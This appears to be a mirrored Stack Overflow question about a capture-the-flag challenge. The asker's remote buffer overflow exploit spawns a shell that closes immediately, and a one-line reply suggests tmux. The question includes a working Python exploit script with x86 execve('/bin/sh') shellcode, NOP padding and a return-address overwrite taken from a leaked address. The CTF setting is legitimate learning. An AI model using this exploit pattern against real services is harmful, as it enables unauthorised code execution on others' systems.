stackoom
  简体   繁体   中英

Buffer Overflow Exploit over using TCP won't keep shell open

 原文  2020-10-23 15:31:15       python/ stack-overflow/ reverse-engineering/ buffer-overflow

Question

I have crafted a buffer overflow exploit for a remote machine for this CTF. The challenge prints out an address, which you then have to use in order to know where your shellcode is being stored. Attached is my current exploit code:

if len(sys.argv) != 3:
    print "Usage: %s host port" % (sys.argv[0])
    sys.exit(0)

s = socket.create_connection([sys.argv[1], int(sys.argv[2])])
recieved = s.recv(4096)
print(recieved)
#send 10 bytes of data
s.send("9999\n")
time.sleep(.2)
raw_input("EXPLOIT ?? ")

print s.recv(4096)

sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" 
pad = "\x90" * 251
IP = struct.pack("I",literal_eval(recieved[13:23]))
print("ADDR: ", recieved[13:23])
s.send(sh + pad + IP)

Essentially first I am creating the connection, then I am sending an input that directs the program to where it needs to go in order for the exploit to be possible (not really relevant for this question)

Next I create the exploit itself

The basic premise is:

shellcode + padding + eip

The eip address comes from what is given to my by the output of the program (which is what I am parsing in the IP variable)

That address is the beginning of the buffer, which is where my shellcode starts, and thus where I want to jump to.

I am running the binary using socat so that it is identical to the challenge hosted on the CTF's servers. I attach to the process using GDB and then run my exploit. It succeeds but gives this output:

process 2422 is executing new program: /usr/bin/dash
[Inferior 1 (process 2422) exited normally]
(gdb)

and my connection to the service is terminated.

If I was running this with a local binary, I would use (python file.py ; cat - ;) | ./program to keep the stream open, but that is not an option since I need what the program outputs and have to do it remotely. I have tried using Telnet as well, but then the program just hangs and nothing happens.

1 answers

solution1
 0  2021-09-08 09:00:40

通过 tmux 运行漏洞利用脚本对我有用。

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question why will my buffer overflow exploit open a user shell only instead of a root shell? Gdb Buffer Overflow; Python won't execute Why is my stack buffer overflow exploit not working? Python TCP buffer overflow Selenium won't keep a drop down open when it clicks it Causing a Buffer Overflow Using fgets .py won't open when double clicked at first, BUT opens when I already have IDLE shell open IDLE won't open the tkinter window won't open when i run the program when i click on the shell Using python 3 as a buffer overflow instead of Python 2
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM